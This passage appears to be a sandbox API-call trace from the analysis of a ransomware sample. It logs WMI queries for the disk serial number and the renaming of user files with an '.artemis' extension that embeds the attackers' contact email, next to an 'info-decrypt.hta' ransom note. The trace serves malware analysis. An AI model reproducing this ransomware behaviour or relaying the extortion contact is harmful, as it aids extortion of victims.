puCount=0x71ef140*=0x2) returned 0x0 [0166.606] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=4, puBuffLength=0x71ef13c*=0x0, pszText=0x0 | out: puBuffLength=0x71ef13c*=0xf, pszText=0x0) returned 0x0 [0166.606] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=4, puBuffLength=0x71ef13c*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef13c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.606] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef140 | out: ppv=0x71ef140*=0x72015c) returned 0x0 [0166.606] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef138 | out: pAptType=0x71ef138*=1) returned 0x0 [0166.606] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef13c | out: ppvObject=0x71ef13c*=0x0) returned 0x80004002 [0166.606] IUnknown:Release (This=0x72015c) returned 0x1 [0166.607] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eed60 | out: ppv=0x71eed60*=0x673d018) returned 0x0 [0166.607] WbemLocator:IUnknown:QueryInterface (in: This=0x673d018, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eef78 | out: ppvObject=0x71eef78*=0x0) returned 0x80004002 [0166.607] WbemLocator:IClassFactory:CreateInstance (in: This=0x673d018, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef8c | out: ppvObject=0x71eef8c*=0x6737118) returned 0x0 [0166.607] WbemLocator:IUnknown:Release (This=0x673d018) returned 0x0 [0166.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebac | out: ppvObject=0x71eebac*=0x6737118) returned 0x0 [0166.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0166.607] WbemLocator:IUnknown:AddRef (This=0x6737118) returned 0x3 [0166.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0166.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0166.607] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0166.607] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0166.608] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0166.608] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0166.608] WbemLocator:IUnknown:Release (This=0x6737118) returned 0x2 [0166.608] WbemLocator:IUnknown:Release (This=0x6737118) returned 0x1 [0166.608] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0166.608] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0166.608] WbemLocator:IUnknown:QueryInterface (in: This=0x6737118, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x6737118) returned 0x0 [0166.608] WbemLocator:IUnknown:AddRef (This=0x6737118) returned 0x3 [0166.608] WbemLocator:IUnknown:Release (This=0x6737118) returned 0x2 [0166.608] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0166.608] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0166.608] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0166.608] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x6737128) returned 0x0 [0166.608] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737128, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x672f0a4) returned 0x0 [0167.564] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0a4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x781db4) returned 0x0 [0167.564] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781db4, pProxy=0x672f0a4, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0167.564] WbemLocator:IUnknown:Release (This=0x781db4) returned 0x1 [0167.565] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0a4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x781dd4) returned 0x0 [0167.565] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0a4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x781db4) returned 0x0 [0167.565] WbemLocator:IClientSecurity:SetBlanket (This=0x781db4, pProxy=0x672f0a4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0167.565] WbemLocator:IUnknown:Release (This=0x781db4) returned 0x2 [0167.565] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x1 [0167.565] CoTaskMemFree (pv=0x77e148) [0167.565] WbemLocator:IUnknown:Release (This=0x6737128) returned 0x0 [0167.565] WbemLocator:IUnknown:QueryInterface (in: This=0x672f0a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x781dd4) returned 0x0 [0167.565] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0167.566] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0167.567] WbemLocator:IUnknown:AddRef (This=0x781dd4) returned 0x3 [0167.567] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0167.568] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0167.570] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x781d34) returned 0x0 [0167.570] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781d34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0167.570] WbemLocator:IUnknown:Release (This=0x781d34) returned 0x3 [0167.570] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0167.570] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0167.570] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x781dbc) returned 0x0 [0167.571] WbemLocator:IRpcOptions:Query (in: This=0x781dbc, pPrx=0x781dd4, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0167.571] WbemLocator:IUnknown:Release (This=0x781dbc) returned 0x3 [0167.571] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x2 [0167.571] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0167.571] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0167.571] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x672f0a4) returned 0x0 [0167.571] WbemLocator:IUnknown:AddRef (This=0x672f0a4) returned 0x4 [0167.571] WbemLocator:IUnknown:Release (This=0x672f0a4) returned 0x3 [0167.571] WbemLocator:IUnknown:Release (This=0x672f0a4) returned 0x2 [0167.571] SysStringLen (param_1=0x0) returned 0x0 [0167.571] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738bd0, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0167.571] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0167.571] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.571] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0167.571] WbemLocator:IUnknown:AddRef (This=0x781dd4) returned 0x3 [0167.571] WbemLocator:IUnknown:QueryInterface (in: This=0x781dd4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x781dd4) returned 0x0 [0167.571] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x3 [0167.571] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x2 [0167.572] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0167.572] WbemDefPath:IWbemPath:GetText (in: This=0x6738bd0, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0167.572] IWbemServices:GetObject (in: This=0x672f0a4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673b2d0, ppCallResult=0x0) returned 0x0 [0173.606] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0173.606] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0173.606] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0173.606] IWbemClassObject:Get (in: This=0x673b2d0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3632440*=0, plFlavor=0x3632444*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3632440*=8, plFlavor=0x3632444*=0) returned 0x0 [0173.607] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.607] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.607] IWbemClassObject:Get (in: This=0x673b2d0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3632440*=8, plFlavor=0x3632444*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3632440*=8, plFlavor=0x3632444*=0) returned 0x0 [0173.607] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.607] SysStringByteLen (bstr="9C354B42") returned 0x10 [0173.607] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2", lpFilePart=0x0) returned 0x2d [0173.607] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x58 [0173.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0173.607] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0173.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0173.607] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0173.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpFilePart=0x0) returned 0x55 [0173.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpFilePart=0x0) returned 0x55 [0173.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0173.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0173.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62089c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x62089c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x622eb20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0173.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0173.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpFilePart=0x0) returned 0x55 [0173.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0173.610] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), fInfoLevelId=0x0, lpFileInformation=0x3632ccc | out: lpFileInformation=0x3632ccc*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000)) returned 1 [0173.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0173.610] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpFilePart=0x0) returned 0x55 [0173.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0173.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0173.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfe0) returned 1 [0173.612] CoTaskMemAlloc (cb=0x20c) returned 0x98257d0 [0173.612] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x98257d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0173.612] CoTaskMemFree (pv=0x98257d0) [0173.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0173.612] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0173.612] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0173.612] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0173.613] IUnknown:Release (This=0x72015c) returned 0x1 [0173.613] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x6736d98) returned 0x0 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0173.614] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736d98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x6733f10) returned 0x0 [0173.614] WbemDefPath:IUnknown:Release (This=0x6736d98) returned 0x0 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x6733f10) returned 0x0 [0173.614] WbemDefPath:IUnknown:QueryInterface (in: This=0x6733f10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, 